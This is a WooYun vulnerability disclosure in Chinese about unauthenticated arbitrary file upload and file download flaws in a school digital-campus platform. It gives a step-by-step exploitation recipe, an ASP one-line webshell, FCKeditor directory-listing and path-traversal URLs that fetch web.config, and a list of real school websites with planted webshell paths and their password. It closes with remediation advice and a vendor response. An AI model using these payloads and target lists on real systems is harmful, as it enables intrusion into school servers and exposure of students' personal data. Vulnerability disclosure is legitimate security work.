当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103034

漏洞标题:某数字化校园平台通用型任意文件上传(无需登录)

相关厂商:浙江皓翰科技有限公司

漏洞作者: 路人甲

提交时间:2015-03-24 14:03

修复时间:2015-06-24 15:36

公开时间:2015-06-24 15:36

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-26: 厂商已经确认,细节仅向厂商公开
2015-03-29: 细节向第三方安全合作伙伴开放
2015-05-20: 细节向核心白帽子及相关领域专家公开
2015-05-30: 细节向普通白帽子公开
2015-06-09: 细节向实习白帽子公开
2015-06-24: 细节向公众公开

简要描述:

1#任意文件上传
2#任意文件下载

详细说明:

产商的原名叫杭州育友软件有限公司
经过百度得知http://www.yuysoft.com/intro/news/info_show.asp?id=00000049

杭州育友软件有限公司与浙江皓翰文化发展集团强强联合组建新公司,浙江皓翰科技有限公司。code>
杭州育友软件有限公司,1998年创立于天堂硅谷——杭州,涉及领域涵盖互联网业务、学校软件业务、教育城域网、教育移动增值服务以及教育咨询,业务遍及全国各省,是浙江省科学技术厅认定的高新技术企业。 
可通过百度以下关键字搜索案例网站:
<code>1、技术支持:杭州育友软件有限公司
2、IneduPortal/Components/News/infoshow.aspx?newsid


该数字化校园平台大体可以分为3部分,1是校园网站,2是校园博客,3是班级互动平台,4是校园网管理平台,5是校讯通,可能有遗漏,需要注意不是每个客户都有部署以上。
1#任意文件上传
问题出在编辑器
地址:
http://*/IneduPortal/Script/htmledit/upload.aspx
http://*/Inedu3In1/Script/htmledit/upload.aspx
http://*/IneduBlog/Script/htmledit/upload.aspx
该套系统还有使用fck编辑器,厂商应该也发现了fck存在问题,在部分案例中移除了fck的相关组件,但明显没有做到位
2#任意文件下载
http://*/IneduPortal/Components/news/FileDown.aspx?OldName=web.config&NewName=../web.config
http://*/Inedu3In1/Components/news/FileDown.aspx?OldName=web.config&NewName=../web.config
http://*/IneduBlog/Components/news/FileDown.aspx?OldName=web.config&NewName=../web.config
----------------------------分割线-----------------------------------
以杭州经济技术开发区江湾小学http://www.hzjwxx.com/为例

QQ截图20150322105640.png


编辑器的地址是http://www.hzjwxx.com/ineduPortal/Script/htmledit/editor.asp
上传的地址是http://www.hzjwxx.com/IneduPortal/Script/htmledit/upload.aspx
因为该校还部署了校园博客与班级互动平台,所以上传的地址又多了2个
班级互动平台:http://www.hzjwxx.com/Inedu3In1/Script/htmledit/upload.aspx
校园博客:http://www.hzjwxx.com/IneduBlog/Script/htmledit/upload.aspx
我们实际操作上传一遍

QQ截图20150322110345.png


查看源码可以看到文件上传路径,上传时抓包,将filename后缀直接修改为.asp
上传asp或aspx一句话时,会提示内存不足或运行时错误,但文件却有上传成功,这时需要遍历最后四位(0000-9999),因为上传文件名是根据年+月+日+时+分+最后4位随机数字,2015032211012035.jpg

QQ截图20150322112258.png


上传asp图片马无法成功连接,能正常返回路径(上传的时候禁用脚本,或者直接构造上传页面)

QQ截图20150322125737.png


http://www.hzjwxx.com//IneduBlog/UpSource/HtmlUpload/2015032212577309.asp
可以访问但无法菜刀
通过捕获上传时间,遍历文件名后四位得到一句话木马连接

<%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%>


http://www.hzjwxx.com/IneduBlog/UpSource/HtmlUpload/2015032213227979.asp

QQ截图20150322133843.png


QQ截图20150322133709.png


当然这里要说的还有fck,因为厂商实施的不到位,很多站点的fck并未删除(目录为fckeditor或editor)
http://www.hzjwxx.com/ineduportal/editor/editor/fckeditor.html

QQ截图20150322134146.png


直接上传asp,未限制,还可遍历目录

QQ截图20150322134428.png


http://www.hzjwxx.com/ineduportal/editor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../../../../

QQ截图20150322134428.png


http://www.hzjwxx.com/IneduBlog/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../../../../
2#任意文件下载
NewName下载要注意目录结构
http://www.hzjwxx.com/IneduPortal/Components/news/FileDown.aspx?OldName=web.config&NewName=../web.config

QQ截图20150322125301.png


http://www.hzjwxx.com/Inedu3In1/Components/news/FileDown.aspx?OldName=web.config&NewName=../../../web.config

QQ截图20150322125151.png


http://www.hzjwxx.com/IneduBlog/Components/news/FileDown.aspx?OldName=web.config&NewName=../../../web.config

QQ截图20150322125232.png


以下供复现:
http://www.hsddcex.com/IneduPortal/Script/htmledit/upload.aspx
http://www.zjfhjxxx.cn/IneduPortal/Script/htmledit/upload.aspx
http://www.kaiyuanzhongxue.com/IneduPortal/Script/htmledit/upload.aspx
http://www.hzsdlsyzx.com/IneduPortal/Script/htmledit/upload.aspx
http://www.hzxsyx.com/IneduPortal/Script/htmledit/upload.aspx
http://www.hzylz.com/IneduPortal/Script/htmledit/upload.aspx
http://www.xljxx.net/Inedu3in1/Script/htmledit/upload.aspx
http://www.hsddcex.com/ineduportal/fckeditor/editor/fckeditor.html
http://www.hsddcex.com/IneduBlog/fckeditor/editor/fckeditor.html
http://www.hsddcex.com//UserFiles/File/33.asp 密码1
http://www.zjfhjxxx.cn/IneduBlog/fckeditor/editor/fckeditor.html
http://www.zjfhjxxx.cn/UserFiles/File/33.asp 密码1
http://www.hzsdlsyzx.com/IneduBlog/fckeditor/editor/fckeditor.html
http://www.hzsdlsyzx.com//UserFiles/File/33.asp 密码1
http://www.hzxsyx.com/IneduBlog/fckeditor/editor/fckeditor.html
http://www.hzxsyx.com/UserFiles/File/33.asp 密码1
等等,fck未必都在,但Script/htmledit/upload.aspx肯定在
以http://www.hzxsyx.com/IneduBlog/Script/htmledit/upload.aspx为例,上传成功后,报内存不足,无视它,因为上传成功了,我们大致知道文件名是201503221602****.asp
这时候就得遍历了,利用fck未删除我们验证一下文件是否存在即可

QQ截图20150322160322.png


QQ截图20150322160400.png

漏洞证明:

http://www.hsddcex.com/IneduPortal/Components/news/FileDown.aspx?OldName=web.config&NewName=../web.config
http://www.zjfhjxxx.cn/IneduPortal/Components/news/FileDown.aspx?OldName=web.config&NewName=../web.config
http://www.kaiyuanzhongxue.com/IneduPortal/Components/news/FileDown.aspx?OldName=web.config&NewName=../web.config
http://www.hzylz.com/IneduPortal/Components/news/FileDown.aspx?OldName=web.config&NewName=../web.config
http://www.xljxx.net/IneduPortal/Components/news/FileDown.aspx?OldName=web.config&NewName=../web.config
...等等

QQ截图20150322142354.png


QQ截图20150322141219.png


QQ截图20150322141319.png


QQ截图20150322142901.png


学生信息各种泄漏

修复方案:

fck不删的话,就必须像individuation一样,加好权限
htmledit编辑器做好上传过滤
文件下载做好过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-03-26 15:35

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。

最新状态:

暂无